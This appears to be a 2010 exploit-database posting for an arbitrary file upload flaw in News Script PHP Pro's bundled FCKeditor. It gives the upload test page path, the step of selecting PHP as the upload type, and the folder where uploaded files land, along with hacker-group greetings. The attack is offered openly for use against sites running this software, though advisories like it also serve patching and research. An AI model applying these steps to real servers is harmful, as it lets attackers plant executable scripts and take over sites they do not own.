News Script PHP Pro - 'FCKeditor' Arbitrary File Upload



EKU-ID: 22009 CVE: OSVDB-ID:
Author: Net.Edit0r Published: 2010-12-29 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


==============================================================================

        [»] News Script PHP Pro (fckeditor) File Upload Vulnerability

==============================================================================

    [»] Title   :           [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]

    [»] Script  :           [ News Script PHP Pro  ]

    [»] TestedON:           [ linux/php ]

    [»] Download:           [ http://newsscriptphp.com/ ]

    [»] Author  :           [ Net.Edit0r }

    [»] Email   :           [ black.hat.tm@gmail.com ]

    [»] Date    :           [ 2010-12-26 ]

    [»] Version :           [ Full Version ]

    [»] CVE     :           [Web Applications]

###########################################################################


===[ Exploit ]===    ./Iranian HackerZ

  [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html

  [»] Select the "File Upload" To use = php

===[ Upload To ]===

  [»] http://server/[patch]/userfiles/Name File

===[ Demo ]===

  [»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html

Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor

     BHG : Net.Edit0r ~ Darkcoder ~ keracker

###########################################################################